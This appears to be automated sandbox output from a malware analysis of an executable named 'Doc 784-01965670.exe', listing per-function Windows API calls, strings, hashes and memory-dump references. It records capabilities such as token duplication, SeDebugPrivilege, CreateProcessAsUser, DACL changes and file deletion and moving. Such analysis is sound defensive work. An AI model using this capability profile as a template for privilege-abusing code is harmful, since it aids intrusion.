                                                                                                                                    • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                                    • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                    • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                                    Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0044621B
                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                                    • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                                    • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                                    • _wcslen.LIBCMT ref: 0044639E
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                                    • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                                    • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                                    • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                                    • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                                    • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                                    • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                    • API String ID: 2173856841-1027155976
                                                                                                                                    • Opcode ID: dd3fbc5dfca59238d4d8e810ac2ec3cbfbbbad9087bbfadb14fa7de528d26857
                                                                                                                                    • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                                    • Opcode Fuzzy Hash: dd3fbc5dfca59238d4d8e810ac2ec3cbfbbbad9087bbfadb14fa7de528d26857
                                                                                                                                    • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                                    Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID: 0vH$4RH
                                                                                                                                    • API String ID: 1143807570-2085553193
                                                                                                                                    • Opcode ID: d063c81b6d46c843951d1fcf39b71a3da1da6362537048d5aa5123afb1fc8170
                                                                                                                                    • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                                    • Opcode Fuzzy Hash: d063c81b6d46c843951d1fcf39b71a3da1da6362537048d5aa5123afb1fc8170
                                                                                                                                    • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                                                                                    Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,?,C:\Users\user\Desktop\Doc 784-01965670.exe,004A8E80,C:\Users\user\Desktop\Doc 784-01965670.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                      • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                      • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                      • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                    • _wcscat.LIBCMT ref: 0044BD96
                                                                                                                                    • _wcscat.LIBCMT ref: 0044BDBF
                                                                                                                                    • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                                                    • _wcscpy.LIBCMT ref: 0044BE73
                                                                                                                                    • _wcscat.LIBCMT ref: 0044BE85
                                                                                                                                    • _wcscat.LIBCMT ref: 0044BE97
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2188072990-1173974218
                                                                                                                                    • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                    • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                                                    • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                    • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                                                    Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                                    • __swprintf.LIBCMT ref: 00434D91
                                                                                                                                    • _wcslen.LIBCMT ref: 00434D9B
                                                                                                                                    • _wcslen.LIBCMT ref: 00434DB0
                                                                                                                                    • _wcslen.LIBCMT ref: 00434DC5
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                                    • _memset.LIBCMT ref: 00434E27
                                                                                                                                    • _wcslen.LIBCMT ref: 00434E3C
                                                                                                                                    • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                    • API String ID: 302090198-3457252023
                                                                                                                                    • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                    • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                                    • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                    • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                                                    Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                                    • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                    • API String ID: 1312810259-2896544425
                                                                                                                                    • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                    • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                                    • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                    • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                                    Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                                    • __wsplitpath.LIBCMT ref: 004038B2
                                                                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                    • _wcscpy.LIBCMT ref: 004038C7
                                                                                                                                    • _wcscat.LIBCMT ref: 004038DC
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                      • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                                      • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                                    • _wcscpy.LIBCMT ref: 004039C2
                                                                                                                                    • _wcslen.LIBCMT ref: 00403A53
                                                                                                                                    • _wcslen.LIBCMT ref: 00403AAA
                                                                                                                                    Strings
                                                                                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                                    • Unterminated string, xrefs: 0042B9BA
                                                                                                                                    • _, xrefs: 00403B48
                                                                                                                                    • Error opening the file, xrefs: 0042B8AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                    • API String ID: 4115725249-188983378
                                                                                                                                    • Opcode ID: 9d3cc106af837a0ba3a302398e1680714f0cc5ac52ed53ec90940b3ab90f08f5
                                                                                                                                    • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                                    • Opcode Fuzzy Hash: 9d3cc106af837a0ba3a302398e1680714f0cc5ac52ed53ec90940b3ab90f08f5
                                                                                                                                    • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                                    Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                    • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                    • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                                    • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                    • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                                    Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Timetime$Sleep
                                                                                                                                    • String ID: BUTTON
                                                                                                                                    • API String ID: 4176159691-3405671355
                                                                                                                                    • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                    • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                                    • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                    • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                                    Function 00442E1F Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 134fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,75918FB0,75918FB0,?,?,00000000), ref: 00442E40
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                                                                      • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                    • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                                    • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                                                                                    • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                                    • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                                                                                    Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                                      • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                                      • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                                      • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                                    • _memset.LIBCMT ref: 00445E61
                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                                    • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                                    • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                                    • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
